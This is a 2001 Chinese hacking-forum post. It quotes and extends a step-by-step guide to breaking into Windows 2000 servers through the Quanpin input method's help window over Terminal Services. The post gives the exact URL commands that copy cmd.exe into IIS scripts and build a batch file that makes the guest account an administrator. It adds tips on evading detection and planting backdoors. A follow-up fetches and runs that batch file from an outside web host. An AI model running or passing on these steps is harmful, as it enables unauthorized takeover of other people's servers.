别说,还是需要全拼上文输入法的漏洞。记得~有这样一张帖子,但我觉得其做法有点麻烦,而且~~对像我们这样的初学者来说,有点难度。
现在把原帖子放上来
“
引用:
--------------------------------------------------------------------------------
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx……:(
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^)
问题(高手请赐教):
1.如果IE下的www访问需要密码,怎办?
2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功!
3.如果对方139 port不开,有什么办法打开吗?w2k server中怎样控制139端口?
88了,小女子要走了,衷心希望各位高手、Cool GG不要对小女子保守哦,没人帮助的自学好艰苦!:((
Homepage;elise.51.net mailto:forelise@263.net QQ:[7175215]
[被 elise 编辑过(日期 02-06-2001)]
——————————
我黑故我在……
------------------------------------------------------------------------------------
在ELISE的帖子中有一段:
1.跳至url:\winnt\system32 (系统目录在跳至url上已显示出来啦!!)
2.选中net.exe文件,点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加入:user guest /active:yes ,其他的不用再说了吧:)
我试了一下发现很多服务器都没有把GUEST加入到ADMIN组~而当你激活了GUEST后还是无法访问对方电脑的,俺补充一点点确保新手可以成功~
net user guest /active:yes 激活GUEST用户net user guest 123 为GUEST重新设置密码:123
net localgroup administrators guest /add
将GUEST加入ADMINISTRATOR组~
但为了避免服务器被坏人利用请进入后通知管理人员,或者禁止GUEST,把密码加难。
\SYSTEM32\LOGFILES\*.EVT
--------------------------------------------------------------------------------
现在把本人的方法写出来和大家分享。
其实只要把上面提到的BAT文件,用FTP发送到一个主页上(我的主页上就有一个,下载的地址是“http://go2.163.com/~tomylee/hack/tomy.bat/”)。然后用WIN2K登陆——换到全拼状态——右键——帮助——输入法入门——在选项菜单上点右键——跳转到URL——然后就是把http://go2.163.com/~tomylee/hack/tomy.bat/写到URL里面,接下来会出现下载的提示框,先“在当前位置打开该程序”,然后?呵呵,便是击活“GUEST”用户。下一步是什么?
都是国内的机子,希望大家不要太滥用。小心点,太狠对谁都没有好处的。:)
TomyChen
2001-2-15 17:08:38